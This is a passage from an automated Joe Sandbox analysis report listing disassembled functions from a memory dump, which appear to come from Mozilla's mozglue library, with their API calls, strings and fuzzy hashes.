                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: String$Double$Converter@double_conversion@@$Dtoa$Ascii@Builder@2@Builder@2@@Converter@CreateDecimalEcmaIeeeMode@12@Mode@12@@Number@Representation@ScriptShortestV12@__acrt_iob_func__stdio_common_vfprintfstrlen
                                                                                                      • String ID: (root)$ProfileBuffer parse error: %s$expected a Time entry
                                                                                                      • API String ID: 801438305-4149320968
                                                                                                      • Opcode ID: 0eb0b751a21d772b4294ccf64d919b651c209631d38af36403057eb4013d017e
                                                                                                      • Instruction ID: 5e307184f90a82eadbb86efaa2e7bcbaa61da1d49463b11fd31c53f63e8557e7
                                                                                                      • Opcode Fuzzy Hash: 0eb0b751a21d772b4294ccf64d919b651c209631d38af36403057eb4013d017e
                                                                                                      • Instruction Fuzzy Hash: 1791AE70608782AFD724CF28C48469FBBE5AFC9258F10491DE59A87761EB30D949CB53
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: __aulldiv__aullrem
                                                                                                      • String ID: -Infinity$NaN
                                                                                                      • API String ID: 3839614884-2141177498
                                                                                                      • Opcode ID: 1062c20e6dec5fd0cc5eec4377493482bb6ac4d3bde85c67435244e115608d7a
                                                                                                      • Instruction ID: 39086e6b511cc2ebf58d10577f97512da50d06c567b1ddf9d1c5b471d8fec983
                                                                                                      • Opcode Fuzzy Hash: 1062c20e6dec5fd0cc5eec4377493482bb6ac4d3bde85c67435244e115608d7a
                                                                                                      • Instruction Fuzzy Hash: 49C1BD31F043198BEB14CFA8C8907DEB7B6EF84704F154529D426ABB90DB71A94ACB91
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: $-$0$0$1$8$9$@
                                                                                                      • API String ID: 0-3654031807
                                                                                                      • Opcode ID: 7b8dbc240fb85a5ba52f9fd55ed595901d0d630a78896766a83e2113b57754f4
                                                                                                      • Instruction ID: abe827627dbc0af84cef3d061db559c2bde1eb185a7d9a05b933642633e88f9f
                                                                                                      • Opcode Fuzzy Hash: 7b8dbc240fb85a5ba52f9fd55ed595901d0d630a78896766a83e2113b57754f4
                                                                                                      • Instruction Fuzzy Hash: B3629B7160C3458FFF15CE29C09076ABBF2AF86358F384A1DE4E54BA91C3359985CB82
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: __aulldiv$__aullrem
                                                                                                      • String ID:
                                                                                                      • API String ID: 2022606265-0
                                                                                                      • Opcode ID: f56df46d33552dd8100cae53d24ae323fb4832d86786e5cbb4b774b0e277ade9
                                                                                                      • Instruction ID: 7932248c1cdf2b18f43e3215828616b507278a076583a7eb36cc8a009dc56620
                                                                                                      • Opcode Fuzzy Hash: f56df46d33552dd8100cae53d24ae323fb4832d86786e5cbb4b774b0e277ade9
                                                                                                      • Instruction Fuzzy Hash: E5322732B046118FDB18DE2CC890A56BBE6AFC9310F09866DE599CB3E5D730ED05CB91
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • memset.VCRUNTIME140(?,000000FF,?), ref: 6D008A4B
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memset
                                                                                                      • String ID:
                                                                                                      • API String ID: 2221118986-0
                                                                                                      • Opcode ID: 83bd3679e087d2f8c0a363543460151d132c5b050c0c1d93b1d77d16f48f2b37
                                                                                                      • Instruction ID: 1b5adb790f0b8cf37cf34b93fb4d63ae30c5b7fc5acf6f900b4a9b907bba9ce9
                                                                                                      • Opcode Fuzzy Hash: 83bd3679e087d2f8c0a363543460151d132c5b050c0c1d93b1d77d16f48f2b37
                                                                                                      • Instruction Fuzzy Hash: DDB1D676A0421A8FEB14CF68CC91BADB7B6FF85314F1942A9C549DB381D7309985CB90
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • memset.VCRUNTIME140(?,000000FF,?), ref: 6D0088F0
                                                                                                      • memset.VCRUNTIME140(?,000000FF,?,?), ref: 6D00925C
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memset
                                                                                                      • String ID:
                                                                                                      • API String ID: 2221118986-0
                                                                                                      • Opcode ID: 79f258be636af245f773d231f88ec99e234031016a7ca9cdfbf0dc900f23d892
                                                                                                      • Instruction ID: 1f21a6db31266341dd0e28e5e1edf9e54676d4869dea28d6463bc0d6aa51ed33
                                                                                                      • Opcode Fuzzy Hash: 79f258be636af245f773d231f88ec99e234031016a7ca9cdfbf0dc900f23d892
                                                                                                      • Instruction Fuzzy Hash: F6B1B576E0420ADFEB14CE68C8817ADB7B6FF85314F194279C549DB385D730A989CB90
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • InitializeConditionVariable.KERNEL32(?), ref: 6CFD6D45
                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CFD6E1E
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ConditionExclusiveInitializeLockReleaseVariable
                                                                                                      • String ID:
                                                                                                      • API String ID: 4169067295-0
                                                                                                      • Opcode ID: f1f5f1d36176b52faf12b283d8686b50e86b96f3365fc065f59e542457b6ef5c
                                                                                                      • Instruction ID: 522fd77148ad45c2ce48c00bb9e4b8db3f55e7ba70d36f6682aafbb555e6a144
                                                                                                      • Opcode Fuzzy Hash: f1f5f1d36176b52faf12b283d8686b50e86b96f3365fc065f59e542457b6ef5c
                                                                                                      • Instruction Fuzzy Hash: E6A18C746187819FD715CF25C490BAEFBE2BF89308F05495DE88A87751DB70B848CB92
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • VirtualAlloc.KERNEL32(?,?,00001000,00000004), ref: 6CFB4777
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AllocVirtual
                                                                                                      • String ID: MOZ_RELEASE_ASSERT(mNode)
                                                                                                      • API String ID: 4275171209-1351931279
                                                                                                      • Opcode ID: c71b26f2063b3bb9f7070649059d44874eae71bcbf67e7a0081828df42c4f7fe
                                                                                                      • Instruction ID: 8926bd97522b5c023bd34cc5195479b054898d91bd947ff5f0d16bf6ef0b4b17
                                                                                                      • Opcode Fuzzy Hash: c71b26f2063b3bb9f7070649059d44874eae71bcbf67e7a0081828df42c4f7fe
                                                                                                      • Instruction Fuzzy Hash: 13B28E72A056018FD708CF1AC690716FBE2BFC5328B29C76DE4699B7A5D735E841CB80
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: __aulldiv
                                                                                                      • String ID:
                                                                                                      • API String ID: 3732870572-0
                                                                                                      • Opcode ID: db5f37eeb5151a0c79d842b80d44bf315513e08190c289969ce06011ea5de0b8
                                                                                                      • Instruction ID: 6cbd216a35abccdfca8385db586cdb4693a05ebdcb19eb7a66821e500912cdb3
                                                                                                      • Opcode Fuzzy Hash: db5f37eeb5151a0c79d842b80d44bf315513e08190c289969ce06011ea5de0b8
                                                                                                      • Instruction Fuzzy Hash: 8E329031F001198BDF18CE9DC8A17AEF7B2FB89300F15853AD516BB7A0DA349D468B91
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • memcmp.VCRUNTIME140(?,?,6CFA4A63,?,?), ref: 6CFD5F06
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcmp
                                                                                                      • String ID:
                                                                                                      • API String ID: 1475443563-0
                                                                                                      • Opcode ID: 9d0380b1cf9dd1fcef092cd6ad8ee57fc4d9e4e618beb220335e8292e6bc2514
                                                                                                      • Instruction ID: 48b8751f1f83078bfa4651c968e7e9d260a033028d4ec144cd2786f34742cec6
                                                                                                      • Opcode Fuzzy Hash: 9d0380b1cf9dd1fcef092cd6ad8ee57fc4d9e4e618beb220335e8292e6bc2514
                                                                                                      • Instruction Fuzzy Hash: 0DC1B1B5E052098BCB04CFA9C5906EEBBB2FF8A318F29415DD8556BB45D732B805CB90
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 732f8aafec1c0d410ff216b27f2e5c03b4339b09f163d0f101acbef2ddceab04
                                                                                                      • Instruction ID: 3f515f72efde25111b6b6adfddae459fc5b87277f88a2376d821dd9975950375
                                                                                                      • Opcode Fuzzy Hash: 732f8aafec1c0d410ff216b27f2e5c03b4339b09f163d0f101acbef2ddceab04
                                                                                                      • Instruction Fuzzy Hash: 83221875F0461A8FCB14CF98C890AAEF7B2FF88304F548599D44AA7705D771A986CF81
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: c9970ccd4f214dcbf5bfba6659cf8c66e35eaee460deeab104b357eaf5cd9bb1
                                                                                                      • Instruction ID: 012a539029547b951e4457e9f95ec3fcc4cd56e2e3ad17581460bdbf9a191439
                                                                                                      • Opcode Fuzzy Hash: c9970ccd4f214dcbf5bfba6659cf8c66e35eaee460deeab104b357eaf5cd9bb1
                                                                                                      • Instruction Fuzzy Hash: 34F13971A087466FF700CF68C890BBEB7E2AFC9314F258A2DE5D587381E77498458782
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 4e0237b6fe6878b5c9d7142c5b0fdb09dfdf9fcc0206538975243e8437b3ed89
                                                                                                      • Instruction ID: a397220ff2e2e289efda3ea0b1e4980128e593a59d5486ce34578a48392f0189
                                                                                                      • Opcode Fuzzy Hash: 4e0237b6fe6878b5c9d7142c5b0fdb09dfdf9fcc0206538975243e8437b3ed89
                                                                                                      • Instruction Fuzzy Hash: 4CA19171F0061A8BEF08CE69C8913AEB7F2AFC9354F198169D919E7781D7345D068BD0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • LoadLibraryW.KERNEL32(user32,?,6CFCE1A5), ref: 6CFF5606
                                                                                                      • LoadLibraryW.KERNEL32(gdi32,?,6CFCE1A5), ref: 6CFF560F
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetThreadDpiAwarenessContext), ref: 6CFF5633
                                                                                                      • GetProcAddress.KERNEL32(00000000,AreDpiAwarenessContextsEqual), ref: 6CFF563D
                                                                                                      • GetProcAddress.KERNEL32(00000000,EnableNonClientDpiScaling), ref: 6CFF566C
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetSystemMetricsForDpi), ref: 6CFF567D
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetDpiForWindow), ref: 6CFF5696
                                                                                                      • GetProcAddress.KERNEL32(00000000,RegisterClassW), ref: 6CFF56B2
                                                                                                      • GetProcAddress.KERNEL32(00000000,CreateWindowExW), ref: 6CFF56CB
                                                                                                      • GetProcAddress.KERNEL32(00000000,ShowWindow), ref: 6CFF56E4
                                                                                                      • GetProcAddress.KERNEL32(00000000,SetWindowPos), ref: 6CFF56FD
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetWindowDC), ref: 6CFF5716
                                                                                                      • GetProcAddress.KERNEL32(00000000,FillRect), ref: 6CFF572F
                                                                                                      • GetProcAddress.KERNEL32(00000000,ReleaseDC), ref: 6CFF5748
                                                                                                      • GetProcAddress.KERNEL32(00000000,LoadIconW), ref: 6CFF5761
                                                                                                      • GetProcAddress.KERNEL32(00000000,LoadCursorW), ref: 6CFF577A
                                                                                                      • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 6CFF5793
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetMonitorInfoW), ref: 6CFF57A8
                                                                                                      • GetProcAddress.KERNEL32(00000000,SetWindowLongPtrW), ref: 6CFF57BD
                                                                                                      • GetProcAddress.KERNEL32(?,StretchDIBits), ref: 6CFF57D5
                                                                                                      • GetProcAddress.KERNEL32(?,CreateSolidBrush), ref: 6CFF57EA
                                                                                                      • GetProcAddress.KERNEL32(?,DeleteObject), ref: 6CFF57FF
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc$LibraryLoad
                                                                                                      • String ID: AreDpiAwarenessContextsEqual$CreateSolidBrush$CreateWindowExW$DeleteObject$EnableNonClientDpiScaling$FillRect$GetDpiForWindow$GetMonitorInfoW$GetSystemMetricsForDpi$GetThreadDpiAwarenessContext$GetWindowDC$LoadCursorW$LoadIconW$MonitorFromWindow$RegisterClassW$ReleaseDC$SetWindowLongPtrW$SetWindowPos$ShowWindow$StretchDIBits$gdi32$user32
                                                                                                      • API String ID: 2238633743-1964193996
                                                                                                      • Opcode ID: 628ec85c608bd5b3e44dbabe1f14442a9027a415b3c13b5027f6aedf40affa77
                                                                                                      • Instruction ID: 505465d0c14856629295f5b5d3ec5de10dbea4b19c33748bf897e9a36fd36d84
                                                                                                      • Opcode Fuzzy Hash: 628ec85c608bd5b3e44dbabe1f14442a9027a415b3c13b5027f6aedf40affa77
                                                                                                      • Instruction Fuzzy Hash: 25514C71509706ABEF005FB58D49B3A3EFDBB17345B108029A935E2A93EB74C801CF61
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,default,?,6CFA582D), ref: 6CFDCC27
                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,java,?,?,?,6CFA582D), ref: 6CFDCC3D
                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,6D00FE98,?,?,?,?,?,6CFA582D), ref: 6CFDCC56
                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,leaf,?,?,?,?,?,?,?,6CFA582D), ref: 6CFDCC6C
                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,mainthreadio,?,?,?,?,?,?,?,?,?,6CFA582D), ref: 6CFDCC82
                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,fileio,?,?,?,?,?,?,?,?,?,?,?,6CFA582D), ref: 6CFDCC98
                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,fileioall,?,?,?,?,?,?,?,?,?,?,?,?,?,6CFA582D), ref: 6CFDCCAE
                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,noiostacks), ref: 6CFDCCC4
                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,screenshots), ref: 6CFDCCDA
                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,seqstyle), ref: 6CFDCCEC
                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,stackwalk), ref: 6CFDCCFE
                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,jsallocations), ref: 6CFDCD14
                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,nostacksampling), ref: 6CFDCD82
                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,preferencereads), ref: 6CFDCD98
                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,nativeallocations), ref: 6CFDCDAE
                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,ipcmessages), ref: 6CFDCDC4
                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,audiocallbacktracing), ref: 6CFDCDDA
                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,cpu), ref: 6CFDCDF0
                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,notimerresolutionchange), ref: 6CFDCE06
                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,cpuallthreads), ref: 6CFDCE1C
                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,samplingallthreads), ref: 6CFDCE32
                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,markersallthreads), ref: 6CFDCE48
                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,unregisteredthreads), ref: 6CFDCE5E
                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,processcpu), ref: 6CFDCE74
                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,power), ref: 6CFDCE8A
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: strcmp
                                                                                                      • String ID: Unrecognized feature "%s".$audiocallbacktracing$cpuallthreads$default$fileio$fileioall$ipcmessages$java$jsallocations$leaf$mainthreadio$markersallthreads$nativeallocations$noiostacks$nostacksampling$notimerresolutionchange$power$preferencereads$processcpu$samplingallthreads$screenshots$seqstyle$stackwalk$unregisteredthreads
                                                                                                      • API String ID: 1004003707-2809817890
                                                                                                      • Opcode ID: 22327176af09677467ebceef8ee596000f86aeb98c9c743fb6242b11abd07589
                                                                                                      • Instruction ID: ce82279ef7a196452677c972554096739c59323eb8df6698aee3d71ae6f715c2
                                                                                                      • Opcode Fuzzy Hash: 22327176af09677467ebceef8ee596000f86aeb98c9c743fb6242b11abd07589
                                                                                                      • Instruction Fuzzy Hash: 0651D8C2A4D22532FA0075166D10B7B5A0DDF1334AF2A403AFE2DA29C1FF15B31586BB
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                        • Part of subcall function 6CFA4730: GetModuleHandleW.KERNEL32(00000000,?,?,?,?,6CFA44B2,6D01E21C,6D01F7F8), ref: 6CFA473E
                                                                                                        • Part of subcall function 6CFA4730: GetProcAddress.KERNEL32(00000000,GetNtLoaderAPI), ref: 6CFA474A
                                                                                                      • GetModuleHandleW.KERNEL32(WRusr.dll), ref: 6CFA44BA
                                                                                                      • LoadLibraryW.KERNEL32(kernel32.dll), ref: 6CFA44D2
                                                                                                      • InitOnceExecuteOnce.KERNEL32(6D01F80C,6CF9F240,?,?), ref: 6CFA451A
                                                                                                      • GetModuleHandleW.KERNEL32(user32.dll), ref: 6CFA455C
                                                                                                      • LoadLibraryW.KERNEL32(?), ref: 6CFA4592
                                                                                                      • InitializeCriticalSection.KERNEL32(6D01F770), ref: 6CFA45A2
                                                                                                      • moz_xmalloc.MOZGLUE(00000008), ref: 6CFA45AA
                                                                                                      • moz_xmalloc.MOZGLUE(00000018), ref: 6CFA45BB
                                                                                                      • InitOnceExecuteOnce.KERNEL32(6D01F818,6CF9F240,?,?), ref: 6CFA4612
                                                                                                      • ?IsWin32kLockedDown@mozilla@@YA_NXZ.MOZGLUE ref: 6CFA4636
